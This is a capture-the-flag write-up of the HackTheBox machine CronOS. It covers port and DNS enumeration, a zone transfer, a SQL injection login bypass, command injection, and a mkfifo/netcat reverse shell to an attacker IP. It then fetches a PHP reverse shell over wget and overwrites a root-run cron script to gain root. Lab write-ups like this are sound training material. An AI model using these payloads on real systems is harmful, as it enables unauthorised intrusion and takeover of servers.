Another OSCP-like Box: CronOS

This is my third writeup in the OSCP-like Boxes series.

CronOS , a HackTheBox machine at 10.10.10.13, is a Linux box that aims to help aspiring Penetration Tester practice on Enumeration, SQL and Command Injections and exploiting weak permissions in Cron job.

Scanning and Enumeration

I normally start my enumeration with Nmap.

sudo nmap -T5 -n -vvv -oA initial-scan 10.10.10.13

Figure 1.0

• -T5 is the fastest scan. The default scan speed is -T3
• -n disables name resolution
• ---vvv uses a verbose scan
• -oA saves the output in all file formats

Next, I performed a targeted scan on the open TCP ports. I used a Default-NSE Script, Version and Operating System scans.

sudo nmap -sC -sV -O -p22,53,80 -oA targeted-scan 10.10.10.10.13

Figure 1.1

All TCP Port Scan

To confirm all open TCP ports, I used Masscan. Alternatively, I can also use Nmap -p- option here.

sudo masscan -e tun0 -p1-65535 --interactive 10.10.10.13

Figure 1.2

UDP Scan

It’s a best practice to scan the UDP ports. I started with common ports since UDP takes a lot of time to finish.

sudo nmap -sU -sC --top-ports 20 -oA udp-top20 10.10.10.13

Figure 1.3

Based on my scans, I found that TCP ports 22, 80, and 53 are open.

Port 22

I continued my enumeration and possible exploitation on port 22. Based on Figure 1.1 this is running OpenSSH 7.2p2. There are no major vulnerabilities for this version. Generally, I dont see any major vulnerability on SSH unless its a very old version.

Port 80

I also browsed the web server and it seemed running the default configuration.

Figure 1.4

Nikto

I ran Nikto to enumerate the web server hoping we can find anything useful.

nikto -h 10.10.10.13

Figure 1.5

Gobuster

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.10.13

I also used Gobuster to see any exposed directory on the web server.

Figure 1.6

Port 53

Nslookup

Since I didn't get any meaningful information on the web server, I then enumerated the DNS server.

nslookup 10.10.10.13 10.10.10.13

The first argument in this Non-interactive Nslookup command is the name or the IP Address of the host to be looked up while the second argument specifies the host name or address of a name server.

Figure 1.7

Based on Nslookup, I found out the cronos.com domain name.

Exploitation

I then performed a DNS Zone Transfer since the server is running on TCP. I used Dig.

dig axfr @10.10.10.13 cronos.htb

Figure 1.8

I found additional host such as admin.cronos.htb. I then added cronos.htb, admin.cronos.htb, ns1.cronos.htb to the /etc/host file in my Kali.

sudo nano /etc/hosts

Figure 1.9

SQL Injection

I checked admin.cronos.htb in a browser and noticed that it’s an authentication page. Common usernames and passwords did not work for this page.

Figure 2.0

I then tested the fields for SQL injection vulnerability and attack. I used this link for reference. I entered the common SQL injection attack below in the username and the password fields. I added a trailing space after “--”.

‘ OR ‘1’=’1' --

Figure 2.1

I was able to bypass the authentication page and found a basic application that performs Traceroute and Ping commands.

Figure 2.2

I tried if I can perform a command injection in this basic application. This link is a good reference for Command Injection attacks.

Figure 2.3

Based on the output, I was able to perform a Command Injection using the “|” character.

Reverse Shell

I then tried multiple reverse shell one liner. I had multiple success with the reverse shell one-liner from this Github link.

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.4 4444 >/tmp/f

Listener

I ran a Netcat listener on port 4444

sudo nc -nlvp 4444

Figure 2.4

Figure 2.5

Figure 2.6

I then had a non-interactive reverse shell of CronOS.

Post Exploitation

I upgraded my access to an interactive shell. Please refer to this link on how to upgrade your shell.

A good tool to use in doing Privilege Escalation is Linux Smart Enumeration from Diego Blanco. It can be downloaded from this Github link.

wget https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh

Figure 2.7

Host the file using SimpleHTTPServer

sudo python -m SimpleHTTPServer 80

Figure 2.8

I then went to a directory that I have write permission and downloaded the tool using Wget.

cd /dev/shm
wget http://10.10.14.4/lse.sh

Figure 2.9

I ran the script using the following syntax.

bash lse.sh -i -l 1

Figure 3.0

Looking at the tool output, I noticed a Cron job that is not default in a Linux host. I checked the permission of the script and found out that the Root user created this Cron job but the file itself is owned by www-data. Since www-data has full permission of /var/www/laravel/artisan, I just replaced it with a reverse shell and got a root access when the Cron job ran.

ls -l /var/www/laravel/artisan

Figure 3.1

I looked for a PHP reverse shell script in Kali, edited the IP of the script to the IP of my Kali and overwrite the Cron job file.

locate php-reverse-shell
cp /usr/share/laudanum/php/php-reverse-shell.php .

Figure 3.2

nano php-reverse-shell

I changed the IP in the script to 10.10.14.4, the IP of my Kali.

Figure 3.3

Host the file using SimpleHTTPServer and transfer the file to CronOS

python -m SimpleHTTPServer

Figure 3.4

wget http://10.10.14.4/php-reverse-shell.php

Figure 3.5

Listener

I set up another Netcat listener on port 8888 then copied php-reverse-shell.php to var/www/laravel/artisan

nc -nlvp 8888

Figure 3.6

cp php-reverse-shell.php /var/www/laravel/artisan

Figure 3.7

Root access!

Figure 3.8

Flags

Figure 3.9

Key Takeaways

• Limit the information that the DNS server will provide, disable DNS zone transfers to untrusted servers.
• Practice SDLC when creating applications
• Apply appropriate patch and mitigations to different injection attacks
• Implement proper file permissions